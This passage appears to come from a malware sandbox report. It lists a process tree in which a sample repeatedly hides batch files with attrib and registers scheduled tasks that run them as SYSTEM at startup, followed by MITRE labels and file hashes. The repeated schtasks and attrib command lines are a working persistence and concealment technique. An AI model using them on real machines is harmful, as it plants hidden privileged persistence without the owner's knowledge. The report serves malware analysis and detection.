                                                                                                                        schtasks /create /tn "HiddenTask73" /tr "C:\hidden73.bat" /sc onstart /ru System
                                                                                                                        2⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:2244
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\hidden74.bat
                                                                                                                        2⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:4968
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /tn "HiddenTask74" /tr "C:\hidden74.bat" /sc onstart /ru System
                                                                                                                        2⤵
                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                        PID:568
                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                        attrib +h +s C:\hidden75.bat
                                                                                                                        2⤵
                                                                                                                        • Views/modifies file attributes
                                                                                                                        PID:1700
                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                        schtasks /create /tn "HiddenTask75" /tr "C:\hidden75.bat" /sc onstart /ru System
                                                                                                                        2⤵
                                                                                                                          PID:4564
                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                          attrib +h +s C:\hidden76.bat
                                                                                                                          2⤵
                                                                                                                          • Views/modifies file attributes
                                                                                                                          PID:4980
                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                          schtasks /create /tn "HiddenTask76" /tr "C:\hidden76.bat" /sc onstart /ru System
                                                                                                                          2⤵
                                                                                                                            PID:1636
                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                            attrib +h +s C:\hidden77.bat
                                                                                                                            2⤵
                                                                                                                            • Views/modifies file attributes
                                                                                                                            PID:1956
                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                            schtasks /create /tn "HiddenTask77" /tr "C:\hidden77.bat" /sc onstart /ru System
                                                                                                                            2⤵
                                                                                                                              PID:4788
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib +h +s C:\hidden78.bat
                                                                                                                              2⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:900
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /create /tn "HiddenTask78" /tr "C:\hidden78.bat" /sc onstart /ru System
                                                                                                                              2⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:3032
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib +h +s C:\hidden79.bat
                                                                                                                              2⤵
                                                                                                                              • Views/modifies file attributes
                                                                                                                              PID:1848
                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                              schtasks /create /tn "HiddenTask79" /tr "C:\hidden79.bat" /sc onstart /ru System
                                                                                                                              2⤵
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:2180
                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                              attrib +h +s C:\hidden80.bat
                                                                                                                              2⤵
                                                                                                                                PID:2848
                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                schtasks /create /tn "HiddenTask80" /tr "C:\hidden80.bat" /sc onstart /ru System
                                                                                                                                2⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:3152
                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                attrib +h +s C:\hidden81.bat
                                                                                                                                2⤵
                                                                                                                                  PID:1416
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks /create /tn "HiddenTask81" /tr "C:\hidden81.bat" /sc onstart /ru System
                                                                                                                                  2⤵
                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                  PID:3504
                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                  attrib +h +s C:\hidden82.bat
                                                                                                                                  2⤵
                                                                                                                                  • Views/modifies file attributes
                                                                                                                                  PID:2160
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  schtasks /create /tn "HiddenTask82" /tr "C:\hidden82.bat" /sc onstart /ru System
                                                                                                                                  2⤵
                                                                                                                                    PID:3440
                                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                                    attrib +h +s C:\hidden83.bat
                                                                                                                                    2⤵
                                                                                                                                    • Views/modifies file attributes
                                                                                                                                    PID:1780
                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                    schtasks /create /tn "HiddenTask83" /tr "C:\hidden83.bat" /sc onstart /ru System
                                                                                                                                    2⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:3532
                                                                                                                                  • C:\Windows\system32\attrib.exe
                                                                                                                                    attrib +h +s C:\hidden84.bat
                                                                                                                                    2⤵
                                                                                                                                      PID:3592
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /tn "HiddenTask84" /tr "C:\hidden84.bat" /sc onstart /ru System
                                                                                                                                      2⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:4744
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +h +s C:\hidden85.bat
                                                                                                                                      2⤵
                                                                                                                                      • Views/modifies file attributes
                                                                                                                                      PID:3988
                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                      schtasks /create /tn "HiddenTask85" /tr "C:\hidden85.bat" /sc onstart /ru System
                                                                                                                                      2⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:4680
                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                      attrib +h +s C:\hidden86.bat
                                                                                                                                      2⤵
                                                                                                                                        PID:2104
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks /create /tn "HiddenTask86" /tr "C:\hidden86.bat" /sc onstart /ru System
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:2644
                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                        attrib +h +s C:\hidden87.bat
                                                                                                                                        2⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:5056
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks /create /tn "HiddenTask87" /tr "C:\hidden87.bat" /sc onstart /ru System
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4828
                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                        attrib +h +s C:\hidden88.bat
                                                                                                                                        2⤵
                                                                                                                                        • Views/modifies file attributes
                                                                                                                                        PID:2236
                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                        schtasks /create /tn "HiddenTask88" /tr "C:\hidden88.bat" /sc onstart /ru System
                                                                                                                                        2⤵
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:4924
                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                        attrib +h +s C:\hidden89.bat
                                                                                                                                        2⤵
                                                                                                                                          PID:244
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /create /tn "HiddenTask89" /tr "C:\hidden89.bat" /sc onstart /ru System
                                                                                                                                          2⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:3880
                                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                                          attrib +h +s C:\hidden90.bat
                                                                                                                                          2⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:2316
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /create /tn "HiddenTask90" /tr "C:\hidden90.bat" /sc onstart /ru System
                                                                                                                                          2⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2368
                                                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                                                          attrib +h +s C:\hidden91.bat
                                                                                                                                          2⤵
                                                                                                                                          • Views/modifies file attributes
                                                                                                                                          PID:2740
                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                          schtasks /create /tn "HiddenTask91" /tr "C:\hidden91.bat" /sc onstart /ru System
                                                                                                                                          2⤵
                                                                                                                                            PID:3088
                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                            attrib +h +s C:\hidden92.bat
                                                                                                                                            2⤵
                                                                                                                                            • Views/modifies file attributes
                                                                                                                                            PID:852
                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                            schtasks /create /tn "HiddenTask92" /tr "C:\hidden92.bat" /sc onstart /ru System
                                                                                                                                            2⤵
                                                                                                                                              PID:4216
                                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                                              attrib +h +s C:\hidden93.bat
                                                                                                                                              2⤵
                                                                                                                                              • Views/modifies file attributes
                                                                                                                                              PID:3728
                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                              schtasks /create /tn "HiddenTask93" /tr "C:\hidden93.bat" /sc onstart /ru System
                                                                                                                                              2⤵
                                                                                                                                                PID:3964
                                                                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                                                                attrib +h +s C:\hidden94.bat
                                                                                                                                                2⤵
                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                PID:4188
                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                schtasks /create /tn "HiddenTask94" /tr "C:\hidden94.bat" /sc onstart /ru System
                                                                                                                                                2⤵
                                                                                                                                                  PID:4652
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +h +s C:\hidden95.bat
                                                                                                                                                  2⤵
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:4776
                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                  schtasks /create /tn "HiddenTask95" /tr "C:\hidden95.bat" /sc onstart /ru System
                                                                                                                                                  2⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:1588
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +h +s C:\hidden96.bat
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1108
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    schtasks /create /tn "HiddenTask96" /tr "C:\hidden96.bat" /sc onstart /ru System
                                                                                                                                                    2⤵
                                                                                                                                                      PID:1528
                                                                                                                                                    • C:\Windows\system32\attrib.exe
                                                                                                                                                      attrib +h +s C:\hidden97.bat
                                                                                                                                                      2⤵
                                                                                                                                                        PID:880
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks /create /tn "HiddenTask97" /tr "C:\hidden97.bat" /sc onstart /ru System
                                                                                                                                                        2⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:4916
                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                        attrib +h +s C:\hidden98.bat
                                                                                                                                                        2⤵
                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                        PID:1944
                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                        schtasks /create /tn "HiddenTask98" /tr "C:\hidden98.bat" /sc onstart /ru System
                                                                                                                                                        2⤵
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:3940
                                                                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                                                                        attrib +h +s C:\hidden99.bat
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4428
                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                          schtasks /create /tn "HiddenTask99" /tr "C:\hidden99.bat" /sc onstart /ru System
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4540
                                                                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                                                                            attrib +h +s C:\hidden100.bat
                                                                                                                                                            2⤵
                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                            PID:1824
                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                            schtasks /create /tn "HiddenTask100" /tr "C:\hidden100.bat" /sc onstart /ru System
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2736
                                                                                                                                                            • C:\Windows\system32\attrib.exe
                                                                                                                                                              attrib +h +s F:\hidden1.bat
                                                                                                                                                              2⤵
                                                                                                                                                                PID:1496
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks /create /tn "HiddenTask1" /tr "F:\hidden1.bat" /sc onstart /ru System
                                                                                                                                                                2⤵
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:1704
                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\sa.bat
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:388

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\hidden1.bat

                                                                                                                                                              Filesize

                                                                                                                                                              4KB

                                                                                                                                                              MD5

                                                                                                                                                              fa632469970851bea61bc599f60804ab

                                                                                                                                                              SHA1

                                                                                                                                                              8c25b218fe42577c7f7da82a90f1c302aadb934e

                                                                                                                                                              SHA256

                                                                                                                                                              fc54b3fa585ed5f0ba2e4bcb35fef5efab3047fda88faf4f929edf6906e96e8a

                                                                                                                                                              SHA512

                                                                                                                                                              df7a1ff63ad4116f11728d7eb2cc11c7e4bba5bcc2f250885d491efa370be3eef2e320665bfae17856549640556d94b49d6bd063155966059c53854391e7c6af